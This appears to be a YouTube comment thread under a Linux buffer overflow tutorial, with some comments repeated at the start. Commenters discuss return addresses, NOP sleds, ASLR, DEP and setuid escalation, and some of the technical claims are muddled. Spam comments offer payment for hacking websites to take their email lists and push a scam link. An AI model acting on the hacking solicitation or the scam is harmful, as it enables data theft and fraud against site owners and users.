@king5201 what do you mean by calculate? and if you mean the part where your subtracting the NOP bits, then putting it in little endian is the way.. \xdc\xf2\xff\xbf
For anyone wondering, what he did at the end was set the suid bit. Basically, when the program runs, it normally runs as the owner of the file (in this case root but not always). This is common for programs such as passwd (to change your password). The passwd program edits /etc/passwd even when run by a normal user. On the other hand, if this program was a network program, you could use something similar to connect via the network to get a shell as the user who is running the program.
@Tsakos17 If you hear some sort of song on any youtube video, check out close to the bottom of the About Video section. It shows Juno Reactor - Masters of the Universe. That's the song name. Just a little tip. ;-)
@staxjp thanks man! oh ye i get you now , it would have looked better i suppose :P but oh well you can all do it urselves from this tutorial now anyway! :D
@augus1990 remember, i did turn ASLR off, which makes it virtually unrealistic that it wil be this easy in a real life situtation, kernel 2.6 < for linux now has ASLR enabled meaning this exact way wont work. and yes thats a good idea augus, i may make a video explaining each step and what is happening with the stack at each moment, thanks for the comment , and ur english is good :D
@sig111immense It works on windows, they dont seem o have stack protection even with windows server 2008, all they have is DEP, all that does is randomize name space similar to randomize_va_space, so you can still do a buffer overflow if you inject the code directly. which was what is done here. The only attack it really stops is those who choose to exploit locally by putting shellcode into a system variable and then use the BO to jump to that segment
@staxjp yeah i no, but ASLR is what randomizes the stack not DEP, DEP is for making code on the stack non executable and stopping execution etc. DEP + ASLR BYPASS is the way to exploit on windows much more complicated than linux kernel
@sig111immense hmm, I have a copy of windows server 2008 ive been playing with, I have DEP turned on, when i turn it off, the randomization stops... When dep is on, I am able to create a simple buffer overflow jumping to a segment of memory having it execute, It does the same thing on a few other machines in class, I'm not injecting shell code or anything, I am just making it jump to a existing function within the code that it cannot access with the main loop, only by overflow...
This has been flagged as spam show
I need someone who is capable of hacking* websites & accessing their "email listing"
database
I am willing to pay up to 3000$ per website.I need a partner who can work 10-20 websites
monthly.The pay will increase upon delivery of faster & quality service
Pls note,CONTINUITY is what I am after...
my email is omorye007@yahoo.com
Please Reply/Send Me A Mail
Cheers
hacknixx 4 weeks ago
This has been flagged as spam show
I need someone who is capable of hacking* websites & accessing their "email listing"
database
I am willing to pay up to 3000$ per website.I need a partner who can work 10-20 websites
monthly.The pay will increase upon delivery of faster & quality service
Pls note,CONTINUITY is what I am after...
my email is omorye007@yahoo.com
Please Reply/Send Me A Mail
Cheers
hacknixx 4 weeks ago
sorry bro but you need to actually talk over the video instead of having gay ass music lol
its more educational that way
gen1mx6 1 month ago
I can't help but notice you started as root... Could you do the same thing as a lower-level user?
LuEPSoft 1 month ago
how do you calculate the address "0xbfff2dc"?
king5201 9 months ago
@king5201 what do you mean by calculate? and if you mean the part where your subtracting the NOP bits, then putting it in little endian is the way.. \xdc\xf2\xff\xbf
sig111immense 9 months ago
nice.. now a viedo about fuzzing... and we're all set, eh? ;)
darkdan4ever 9 months ago
will you decipher the ...::: OnyxCode :::...
OnyxCode 10 months ago
@OnyxCode check ur profile
sig111immense 10 months ago
For anyone wondering, what he did at the end was set the suid bit. Basically, when the program runs, it normally runs as the owner of the file (in this case root but not always). This is common for programs such as passwd (to change your password). The passwd program edits /etc/passwd even when run by a normal user. On the other hand, if this program was a network program, you could use something similar to connect via the network to get a shell as the user who is running the program.
wolfricacc 1 year ago
@wolfricacc thanks for that :) a good explanation for those who were curious :)
sig111immense 1 year ago
@wolfricacc What "He" did in the end ? so you're saying this video isn't yours ?
NoShit12 1 year ago
@NoShit12 no sure i'm not even the uploader. sig111immense is
wolfricacc 1 year ago
Wow, the music is bad-ass, what's the name of it?
Tsakos17 1 year ago
@Tsakos17 If you hear some sort of song on any youtube video, check out close to the bottom of the About Video section. It shows Juno Reactor - Masters of the Universe. That's the song name. Just a little tip. ;-)
2pimpinout 1 year ago
@2pimpinout Thanks for that saving me a reply :P
sig111immense 1 year ago
why did you do it all as root
you should have showed how the sticky bit works too to make it like a real exploit
chmod a=xs ./vulnapp
staxjp 1 year ago
@staxjp well what the video is showing still works as a normal user anyway , and at the end as you can see i completed the exploit as a non root user
sig111immense 1 year ago
@sig111immense
staxjp 1 year ago
@sig111immense This is an awesome tutorial!!! Kudos! I just said the sticky bit thing for dramatic effect...
staxjp 1 year ago
@staxjp thanks man! oh ye i get you now , it would have looked better i suppose :P but oh well you can all do it urselves from this tutorial now anyway! :D
sig111immense 1 year ago
I can't believe that it's so easy get root privilegies on linux...
It would be great if you make a video tutorial about the stack structure to know more about it.
Thank you and I sorry for my english, bye
augus1990 1 year ago
@augus1990 remember, i did turn ASLR off, which makes it virtually unrealistic that it wil be this easy in a real life situtation, kernel 2.6 < for linux now has ASLR enabled meaning this exact way wont work. and yes thats a good idea augus, i may make a video explaining each step and what is happening with the stack at each moment, thanks for the comment , and ur english is good :D
sig111immense 1 year ago
@sig111immense It works on windows, they dont seem o have stack protection even with windows server 2008, all they have is DEP, all that does is randomize name space similar to randomize_va_space, so you can still do a buffer overflow if you inject the code directly. which was what is done here. The only attack it really stops is those who choose to exploit locally by putting shellcode into a system variable and then use the BO to jump to that segment
staxjp 1 year ago
@staxjp yeah i no, but ASLR is what randomizes the stack not DEP, DEP is for making code on the stack non executable and stopping execution etc. DEP + ASLR BYPASS is the way to exploit on windows much more complicated than linux kernel
sig111immense 1 year ago
@sig111immense hmm, I have a copy of windows server 2008 ive been playing with, I have DEP turned on, when i turn it off, the randomization stops... When dep is on, I am able to create a simple buffer overflow jumping to a segment of memory having it execute, It does the same thing on a few other machines in class, I'm not injecting shell code or anything, I am just making it jump to a existing function within the code that it cannot access with the main loop, only by overflow...
staxjp 1 year ago
This has been flagged as spam show
RunescapePinGenerator(.)com/?me=72547 delete the () free membership
EpicduelFight 1 year ago
hi, I really liked the music !! What's it called?
viralchristian 1 year ago
@viralchristian Juno reactor - Masters of the Universe
sig111immense 1 year ago
- Thanks !!
viralchristian 1 year ago
lol, so technical language. Q_Q i dunno any coding language so yeah. :L useless comment.
Otsimura 1 year ago
@Otsimura your mom is a usless comment
staxjp 1 year ago